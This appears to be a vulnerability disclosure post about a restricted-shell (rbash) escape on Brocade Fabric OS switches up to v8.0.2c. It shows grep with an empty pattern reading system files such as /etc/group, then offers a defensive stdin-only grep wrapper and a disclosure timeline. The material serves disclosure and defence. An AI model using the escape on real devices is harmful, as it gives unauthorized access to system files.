
Brocade Fabric OS ≤ v8.0.2c rbash escape to read system files

Broadcom offers a number of products and networking solutions, such as switches and extensions. These products run their own operating system, Fabric OS. It is a lightweight OS, and a user who logs in through SSH or telnet lands in the restricted environment of rbash. The user cannot execute any of the usual system commands, such as ls, echo, cd or cat, and has only a set of custom commands that the developers have provided, e.g.

...
iflshow                    Display edge switch FCR connection information
interfaceshow              Display the FSPF (TM) interface information
iodset                     Manage the in-order delivery (IOD) option
iodshow                    Display the state of the in-order delivery option
ipaddrset                  Set ethernet and FC IP addresses
ipaddrshow                 Print ethernet and FC IP addresses
islshow                    Display the current connections and status
...

One of the available commands is the classic system command grep. The system also allows pipelines (|), which explains why the use of grep is allowed:

HOSTNAME:user> ipaddrshow 
SWITCH
Ethernet IP Address: 10.115.76.184
Ethernet Subnetmask: 255.255.254.0
Gateway IP Address: 10.115.76.251
DHCP: Off

HOSTNAME:user> ipaddrshow |grep Gateway
Gateway IP Address: 10.115.76.251
HOSTNAME:user> 

Because grep is left available, one can read underlying system files by searching for the empty pattern '', which matches every line. The files one has access to depend on the authenticated user's privileges.

HOSTNAME:user> cat /etc/group
rbash: cat: command not found
HOSTNAME:user> ls /etc/group
rbash: ls: command not found
HOSTNAME:user> grep '' /etc/group
root::0:root
sys::3:root,bin
smmsp::25:smmsp
nobody::99:
users::100:
utmp:x:102:
admin::600:admin,root
user::602:user,admin,root
switchadmin::604:
operator::605:
zoneadmin::606:
fabricadmin::607:
basicswitchadmin::608:
securityadmin::609:
udrole::550:
HOSTNAME:user> 
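
One way to keep grep usable as a pipeline filter while closing the file-read path shown above is a wrapper that accepts a pattern but never a file operand. This is an added example, not code from Broadcom or from the original post; the function name `filter_grep`, the `REAL_GREP` variable and the flag allowlist are assumptions.

```shell
#!/bin/sh
# Added example: stdin-only grep wrapper for a restricted CLI (not vendor code).
# Assumption: a deployment would hard-code REAL_GREP to an absolute path that
# is outside the restricted shell's PATH; command -v is used here for portability.
REAL_GREP=${REAL_GREP:-$(command -v grep)}

filter_grep() {
    flags=""
    while [ $# -gt 0 ]; do
        case "$1" in
            --) shift; break ;;
            -)  break ;;
            -*[!ivcnwxEF]*)
                # Anything outside the allowlist is refused, including
                # -f FILE, -r, -e and every long option.
                echo "grep: option not permitted: $1" >&2
                return 2 ;;
            -?*) flags="$flags $1"; shift ;;
            *)  break ;;
        esac
    done
    # Exactly one argument may remain: the pattern. A second one would be a
    # file operand, which is what "grep '' /etc/group" relies on.
    if [ $# -ne 1 ]; then
        echo "usage: <command> | grep [-ivcnwxEF] PATTERN" >&2
        return 2
    fi
    # $flags is unquoted on purpose: it holds only validated flag words.
    "$REAL_GREP" $flags -e "$1"
}

# Constructed demo input, modelled on the ipaddrshow output above.
printf 'Gateway IP Address: 10.115.76.251\nDHCP: Off\n' | filter_grep Gateway
filter_grep '' /etc/group || echo "refused with exit status $?"
```

The pattern is always passed with `-e`, so a pattern that starts with a dash cannot be reinterpreted as an option.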

The issue was discovered by Bitcrack during a penetration test for a client and reported to Broadcom's PSIRT. Broadcom's internal security audit had discovered it earlier this year, and a fix had been scheduled before Bitcrack notified them.

Timeline:

Reported to Broadcom's PSIRT: 26/9/2022
First response and redirecting us to Brocade SIRT: 26/9/2022
Second response letting us know of the found issue: 5/10/2022
Clarifications and request for permission to post on our blog: 10/10/2022
No response from Broadcom, release of the article: 29/11/2022